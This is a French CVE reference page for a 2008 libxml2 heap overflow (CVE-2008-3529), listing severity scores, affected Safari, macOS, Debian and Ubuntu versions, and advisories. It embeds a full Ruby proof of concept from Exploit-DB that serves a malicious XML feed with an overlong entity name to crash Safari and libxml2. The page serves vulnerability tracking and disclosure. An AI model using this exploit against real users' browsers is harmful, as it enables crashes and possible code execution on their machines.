CVE-2008-3529 : Détail

CVE-2008-3529

Overflow
92.07%V3
Network
2008-09-12 14:00 +00:00
2018-10-03 18:57 +00:00

Alerte pour un CVE

Restez informé de toutes modifications pour un CVE spécifique.
Gestion des alertes

Descriptions

Heap-based buffer overflow in the xmlParseAttValueComplex function in parser.c in libxml2 before 2.7.0 allows context-dependent attackers to cause a denial of service (crash) or execute arbitrary code via a long XML entity name.

Informations

Faiblesses connexes

CWE-ID Nom de la faiblesse Source
CWE-119 Improper Restriction of Operations within the Bounds of a Memory Buffer
The product performs operations on a memory buffer, but it reads from or writes to a memory location outside the buffer's intended boundary. This may result in read or write operations on unexpected memory locations that could be linked to other variables, data structures, or internal program data.

Metrics

Metric Score Sévérité CVSS Vecteur Source
V2 10 AV:N/AC:L/Au:N/C:C/I:C/A:C [email protected]

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

EPSS Score

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

EPSS Percentile

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 8798

Date de publication : 2009-05-25 22:00 +00:00
Auteur : Kevin Finisterre
EDB Vérifié : Yes

#!/usr/bin/ruby # # Quick-n-dirty PoC for APPLE-SA-2009-05-12 ala CVE-2008-3529 # Safari RSS feed:// buffer overflow via libxml2 by KF of Digitalmunition and Netragard # http://www.digitalmunition.com , http://www.netragard.com # # The application PubSubAgent quit unexpectedly. # # Process: PubSubAgent [3764] # Path: /System/Library/Frameworks/PubSub.framework/Versions/A/Resources/PubSubAgent.app/Contents/MacOS/PubSubAgent # Identifier: PubSubAgent # Version: ??? (???) # Code Type: X86 (Native) # Parent Process: launchd [282] # # Date/Time: 2008-10-31 15:31:41.355 -0400 # OS Version: Mac OS X 10.5.5 (9F33) # Report Version: 6 # # Exception Type: EXC_BAD_ACCESS (SIGSEGV) # Exception Codes: KERN_INVALID_ADDRESS at 0x0000000005050500 # # Thread 0 crashed with X86 Thread State (32-bit): # eax: 0x41414141 ebx: 0x94580535 ecx: 0x00136150 edx: 0x05050500 # edi: 0x00007000 esi: 0x00100000 ebp: 0xbfffe298 esp: 0xbfffe220 # ss: 0x0000001f efl: 0x00010206 eip: 0x94580605 cs: 0x00000017 # ds: 0x0000001f es: 0x0000001f fs: 0x00000000 gs: 0x00000037 # cr2: 0x05050500 # # On Windows libxml2.dll provides all the fun since there is no PubSubAgent # # EAX 0131FB10 ASCII "AAAAAAAAAAA..." # ECX 003D0270 # EDX 00000000 # EBX 41414141 # ESP 030FE6FC # EBP 030FE918 # ESI 0131FB08 ASCII "AAAAAAAAAAA..." # EDI 41414141 # EIP 7C919084 ntdll.7C919084 # # 7C919084 8B0B MOV ECX,DWORD PTR DS:[EBX] # 7C919086 3B4F 04 CMP ECX,DWORD PTR DS:[EDI+4] require 'webrick' include WEBrick # Thats right... no one is taking on water, this is public info (and has been for a while)! # https://bugzilla.redhat.com/attachment.cgi?id=315480 XML_LOVE = '<?xml version="1.0"?>' + "\n" + '<!DOCTYPE longentity [' + "\n" + '<!ELEMENT longentity (#PCDATA)>' + "\n" + '<!ENTITY ' + "A" * 1000 + " " + '"ha"> ]>' + "\n" + '<longentity location="&' + "A" * 1000 + ';">text</longentity>' + "\n" REDIR_LOVE = '<meta http-equiv="REFRESH" content="0;url=feed://' + ARGV[0] + '/pwn">' s = HTTPServer.new( :Port => 80 ) class REDIRECT < HTTPServlet::AbstractServlet def do_GET(req, res) res.body = REDIR_LOVE res['Content-Type'] = "text/html" end end class XMLLOVER < HTTPServlet::AbstractServlet def do_GET(req, res) res.body = XML_LOVE res['Content-Type'] = "text/xml" end end s.mount("/", REDIRECT) s.mount("/pwn", XMLLOVER) trap("INT"){ s.shutdown } s.start # milw0rm.com [2009-05-26]

Products Mentioned

Configuraton 0

Xmlsoft>>Libxml2 >> Version To (excluding) 2.7.0

Configuraton 0

Debian>>Debian_linux >> Version 4.0

Configuraton 0

Canonical>>Ubuntu_linux >> Version 6.06

Canonical>>Ubuntu_linux >> Version 6.06

Canonical>>Ubuntu_linux >> Version 7.04

Canonical>>Ubuntu_linux >> Version 7.10

Canonical>>Ubuntu_linux >> Version 8.04

Canonical>>Ubuntu_linux >> Version 8.04

Canonical>>Ubuntu_linux >> Version 8.10

Canonical>>Ubuntu_linux >> Version 9.04

Configuraton 0

Apple>>Safari >> Version To (excluding) 4.0

Apple>>Safari >> Version From (including) 3.2.0 To (excluding) 3.2.3

Apple>>Iphone_os >> Version To (excluding) 3.0

Apple>>Mac_os_x >> Version To (excluding) 10.5.7

Apple>>Mac_os_x >> Version 10.5.7

References

http://www.ubuntu.com/usn/USN-815-1
Tags : vendor-advisory, x_refsource_UBUNTU
https://usn.ubuntu.com/644-1/
Tags : vendor-advisory, x_refsource_UBUNTU
http://support.apple.com/kb/HT3639
Tags : x_refsource_CONFIRM
http://secunia.com/advisories/31860
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/32280
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/31855
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.vupen.com/english/advisories/2009/1621
Tags : vdb-entry, x_refsource_VUPEN
http://support.apple.com/kb/HT3549
Tags : x_refsource_CONFIRM
http://secunia.com/advisories/32807
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/31982
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/31868
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.debian.org/security/2008/dsa-1654
Tags : vendor-advisory, x_refsource_DEBIAN
http://xmlsoft.org/news.html
Tags : x_refsource_MISC
http://www.vupen.com/english/advisories/2009/1298
Tags : vdb-entry, x_refsource_VUPEN
http://secunia.com/advisories/35074
Tags : third-party-advisory, x_refsource_SECUNIA
https://www.exploit-db.com/exploits/8798
Tags : exploit, x_refsource_EXPLOIT-DB
http://secunia.com/advisories/36173
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.redhat.com/support/errata/RHSA-2008-0884.html
Tags : vendor-advisory, x_refsource_REDHAT
http://www.vupen.com/english/advisories/2009/1522
Tags : vdb-entry, x_refsource_VUPEN
http://securitytracker.com/id?1020855
Tags : vdb-entry, x_refsource_SECTRACK
http://secunia.com/advisories/32265
Tags : third-party-advisory, x_refsource_SECUNIA
http://security.gentoo.org/glsa/glsa-200812-06.xml
Tags : vendor-advisory, x_refsource_GENTOO
http://secunia.com/advisories/33715
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/35056
Tags : third-party-advisory, x_refsource_SECUNIA
http://sunsolve.sun.com/search/document.do?assetkey=1-26-247346-1
Tags : vendor-advisory, x_refsource_SUNALERT
http://www.securityfocus.com/bid/31126
Tags : vdb-entry, x_refsource_BID
http://secunia.com/advisories/35379
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/33722
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.mandriva.com/security/advisories?name=MDVSA-2008:192
Tags : vendor-advisory, x_refsource_MANDRIVA
http://secunia.com/advisories/32974
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/36235
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.us-cert.gov/cas/techalerts/TA09-133A.html
Tags : third-party-advisory, x_refsource_CERT
http://sunsolve.sun.com/search/document.do?assetkey=1-66-265329-1
Tags : vendor-advisory, x_refsource_SUNALERT
http://www.vupen.com/english/advisories/2009/1297
Tags : vdb-entry, x_refsource_VUPEN
http://support.apple.com/kb/HT3550
Tags : x_refsource_CONFIRM
http://sunsolve.sun.com/search/document.do?assetkey=1-66-261688-1
Tags : vendor-advisory, x_refsource_SUNALERT
http://secunia.com/advisories/31558
Tags : third-party-advisory, x_refsource_SECUNIA
http://support.apple.com/kb/HT3613
Tags : x_refsource_CONFIRM
http://www.vupen.com/english/advisories/2008/2822
Tags : vdb-entry, x_refsource_VUPEN
http://www.redhat.com/support/errata/RHSA-2008-0886.html
Tags : vendor-advisory, x_refsource_REDHAT
Cliquez sur le bouton à gauche (OFF), pour autoriser l'inscription de cookie améliorant les fonctionnalités du site. Cliquez sur le bouton à gauche (Tout accepter), pour ne plus autoriser l'inscription de cookie améliorant les fonctionnalités du site.